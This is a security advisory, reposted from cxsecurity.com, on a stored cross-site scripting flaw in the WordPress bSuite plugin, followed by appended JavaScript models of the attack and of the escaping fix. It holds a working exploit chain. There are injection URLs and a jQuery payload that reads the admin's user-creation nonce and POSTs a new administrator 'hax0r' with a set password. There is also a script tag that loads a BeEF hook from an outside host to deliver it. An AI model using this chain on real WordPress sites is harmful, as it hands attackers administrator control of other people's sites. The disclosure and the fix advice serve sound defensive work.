WordPress bSuite 4.0.7 Cross Site Scripting

2011.07.21
Credit: IHTeam
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Original advisory: http://www.ihteam.net/advisory/bsuite-wordpress-permanent-xss/

*WordPress bSuite <= 4.0.7 Permanent XSS -> Add Admin*

*Download link:* http://wordpress.org/extend/plugins/bsuite/
*Author contacted:* 29/06/2011
*POC published:* 11/07/2011

The plugin is out of date (last update in 2009), so this is just a POC that shows how to turn the XSS into something more useful.

*FIX:* Apply htmlspecialchars to the output.

*Bug found by:* IHTeam
*Follow us on Twitter! @IHTeam* <http://twitter.com/IHTeam>

*CHECK BSUITE:*
Check whether the plugin is present by requesting its script:
http://192.168.1.100/wordpress/plugins/bsuite/js/bsuite.js

*PERMANENT XSS POC:*
The payload can be injected in different ways, for example through the search parameter:
http://192.168.1.100/wordpress/?s=<h2>XSSED</h2>
or directly in the URL:
http://192.168.1.100/wordpress/?p=1&<h1>XSSED</h1>
When the admin opens the bSuite panel, the stored XSSED markup is rendered (screenshot: <http://www.ihteam.net/wp-content/uploads/bsuite_XSSED.jpeg>).

*XSS TO REMOTE ADMIN ADD:*
We will use BeEF <http://beefproject.com/> for this part. So:

1. Run BeEF on your local machine.
2. Enable auto-run of this code:

    jQuery('<div>', { id: 'testbeef' }).appendTo('#screen-meta-links');
    jQuery.get('user-new.php', function(data) {
        jQuery('#testbeef').html(data);
        var nonce = jQuery('#_wpnonce_create-user').val();
        jQuery('#testbeef').html('');
        jQuery.post('user-new.php', {
            '_wp_http_referer': '/wordpress/wp-admin/user-new.php',
            '_wpnonce_create-user': nonce,
            action: 'createuser',
            createuser: 'Add New User',
            email: 'hax0rmail@mail.com',
            first_name: '',
            last_name: '',
            pass1: '123123hello',
            pass2: '123123hello',
            role: 'administrator',
            url: '',
            user_login: 'hax0r'
        });
    });

We make two requests to /wordpress/wp-admin/user-new.php because we first need to grab the _wpnonce_create-user value:

1. Create a new div with ID testbeef.
2. Request user-new.php and append the response to the div.
3. Grab the _wpnonce_create-user value into the nonce variable.
4. Clean the div content.
5. Make a POST request to user-new.php with the correct values.

The hook runs in the logged-in admin's browser on the wp-admin origin, so the fetched form contains a valid nonce for that session and the POST carries the admin's cookies; that is what turns a stored XSS into a user creation that the nonce check would otherwise block.

Review the code to change _wp_http_referer, pass1, pass2 and user_login in the POST request. Now it's time to inject the BeEF hook script into bSuite like this:
http://192.168.1.100/wordpress/?s=<script src="http://192.168.1.102/beef/hook/beefmagic.js.php"></script>
You may have to wait 1h to 5h for bSuite to refresh. The result is a new admin with username hax0r and password 123123hello.
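The two-request chain described above, as an added example that is not part of the IHTeam advisory nor code from the bSuite or BeEF projects. The server side is a hypothetical stand-in for wp-admin/user-new.php (the nonce derivation, the session table and the cookie values are constructed for the example): it issues a per-session nonce in the form and rejects a createuser POST that does not carry it. The hook side mirrors the advisory's payload without jQuery: fetch the form, pull the nonce out of the HTML, then POST with the victim's session. The blindCsrf function shows why the first request is needed at all.

```javascript
// Added example: model of the nonce-harvesting chain from the advisory.
// Server functions are hypothetical stand-ins for wp-admin/user-new.php.
const crypto = require('crypto');

// --- hypothetical server model -------------------------------------------
const users = { admin: { role: 'administrator' } };    // constructed user table
const sessions = { 'admin-cookie': 'admin' };          // constructed cookie -> user map
const SECRET = 'server-secret';                        // constructed, never sent to clients

function nonceFor(cookie) {
  // A nonce bound to the session, in the spirit of _wpnonce_create-user
  // (WP's real derivation differs; this is a simplified model).
  return crypto.createHmac('sha256', SECRET)
    .update('create-user|' + cookie).digest('hex').slice(0, 10);
}

function getUserNewPage(cookie) {
  // GET user-new.php: only a logged-in session gets the form (and the nonce).
  if (!sessions[cookie]) return { status: 302, body: '' };
  return {
    status: 200,
    body: '<form method="post">' +
      '<input type="hidden" id="_wpnonce_create-user" name="_wpnonce_create-user" value="' +
      nonceFor(cookie) + '" />' +
      '<input name="user_login" /><input name="role" /></form>',
  };
}

function postUserNew(cookie, form) {
  // POST user-new.php: capability check, then the CSRF nonce check.
  const who = sessions[cookie];
  if (!who || users[who].role !== 'administrator') return { status: 403 };
  if (form.get('_wpnonce_create-user') !== nonceFor(cookie)) return { status: 403 };
  if (form.get('action') !== 'createuser' || form.get('pass1') !== form.get('pass2')) return { status: 400 };
  users[form.get('user_login')] = { role: form.get('role') };
  return { status: 200 };
}

// --- hook side (what runs in the victim's browser) -------------------------
function extractNonce(html) {
  // Equivalent of jQuery('#_wpnonce_create-user').val() on the fetched page.
  const m = /id="_wpnonce_create-user"[^>]*value="([^"]+)"/.exec(html);
  return m ? m[1] : null;
}

function buildCreateUserForm(nonce, login, password) {
  // Same fields as the advisory's jQuery.post body.
  return new URLSearchParams({
    _wp_http_referer: '/wordpress/wp-admin/user-new.php',
    '_wpnonce_create-user': nonce,
    action: 'createuser',
    createuser: 'Add New User',
    email: 'hax0rmail@mail.com',
    first_name: '', last_name: '',
    pass1: password, pass2: password,
    role: 'administrator', url: '',
    user_login: login,
  });
}

function runHook(cookie, login, password) {
  const page = getUserNewPage(cookie);                  // request 1: fetch the form
  const nonce = extractNonce(page.body);
  if (!nonce) return { created: false, status: page.status };
  const res = postUserNew(cookie, buildCreateUserForm(nonce, login, password)); // request 2
  const created = res.status === 200 && !!users[login] && users[login].role === 'administrator';
  return { created, status: res.status };
}

function blindCsrf(cookie, login) {
  // A plain CSRF POST without reading the form: the admin cookie alone is not enough.
  return postUserNew(cookie, buildCreateUserForm('guessed', login, 'x')).status;
}
```

The model makes the security point explicit: the nonce check defeats a cross-origin POST, and the advisory's chain works only because the stored XSS puts the attacker's JavaScript on the wp-admin origin, where the form response is readable and the victim's cookies ride along.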
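The bug class and the one-line fix from the *FIX:* line, as an added example that is not code from the advisory or from the bSuite plugin. The render functions are hypothetical stand-ins for the plugin's admin-panel output, the stored search terms are a constructed sample built from the advisory's own payloads, and the escaping function reproduces what PHP's htmlspecialchars with ENT_QUOTES does to the five significant characters.

```javascript
// Added example: unescaped output ('before') beside encoded output ('after').
function htmlspecialchars(s) {
  // Mirrors PHP htmlspecialchars(..., ENT_QUOTES): & < > " ' become entities.
  return String(s).replace(/[&<>"']/g, c => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#039;',
  })[c]);
}

// Constructed sample of what the plugin would have stored from visitor
// requests: a benign term plus the advisory's two payloads.
const storedSearches = [
  'wordpress themes',
  '<h2>XSSED</h2>',
  '<script src="http://192.168.1.102/beef/hook/beefmagic.js.php"></script>',
];

function renderVulnerable(terms) {
  // 'Before': raw concatenation, so stored markup becomes live markup in the admin page.
  return '<ul>' + terms.map(t => '<li>' + t + '</li>').join('') + '</ul>';
}

function renderFixed(terms) {
  // 'After': every stored value is encoded at the output boundary.
  return '<ul>' + terms.map(t => '<li>' + htmlspecialchars(t) + '</li>').join('') + '</ul>';
}

function containsLiveTag(html) {
  // Check used to compare the two renders: any start or end tag other than the list markup.
  return /<(?!\/?(ul|li)\b)[a-z]/i.test(html);
}
```

In a WordPress plugin the idiomatic calls are esc_html() for element content and esc_attr() for attribute values; if htmlspecialchars is used directly, pass ENT_QUOTES, because before PHP 8.1 the default flags leave single quotes alone, which is not enough for values printed inside single-quoted attributes.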


Copyright 2024, cxsecurity.com